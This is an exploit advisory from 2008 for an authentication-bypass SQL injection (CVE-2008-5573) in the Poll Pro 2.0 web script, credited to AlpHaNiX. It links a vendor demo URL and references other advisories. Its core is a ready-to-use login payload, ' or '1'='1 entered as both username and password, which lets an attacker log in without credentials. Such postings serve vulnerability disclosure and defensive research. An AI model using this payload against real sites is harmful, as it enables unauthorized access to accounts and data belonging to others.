
Topic: |
Poll Pro 2.0 (Auth Bypass) Remote SQL Injection Vulnerability |
Credit: |
AlpHaNiX |
Date: |
2008.12.17 |
CWE: |
CWE-89 (Show similar)
|
CVE: |
CVE-2008-5573 (Show details)
Use CVE to see details like: - CVSS2, - Affected Software, - References |

| Risk |
Local |
| Remote |
| Medium |
No |
| Yes |
###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################
#Found By : AlpHaNiX
#website : www.offensivetrack.org
#contact : AlpHa[AT]HACKER[DOT]BZ
###########################################################################
#script : PollPro
#Version : v2.0
#download : null
#Demo : http://www.pollpro.com/pollpro2/
###########################################################################
#Exploits :
--=[SQL INJECTION]=--
AUTH BYPASS :
username : ' or '1'='1
password : ' or '1'='1
###########################################################################
References:
http://www.securityfocus.com/bid/32707
http://www.milw0rm.com/exploits/7391
http://secunia.com/advisories/33044
http://osvdb.org/50576
[ ASCII VERSION ]
|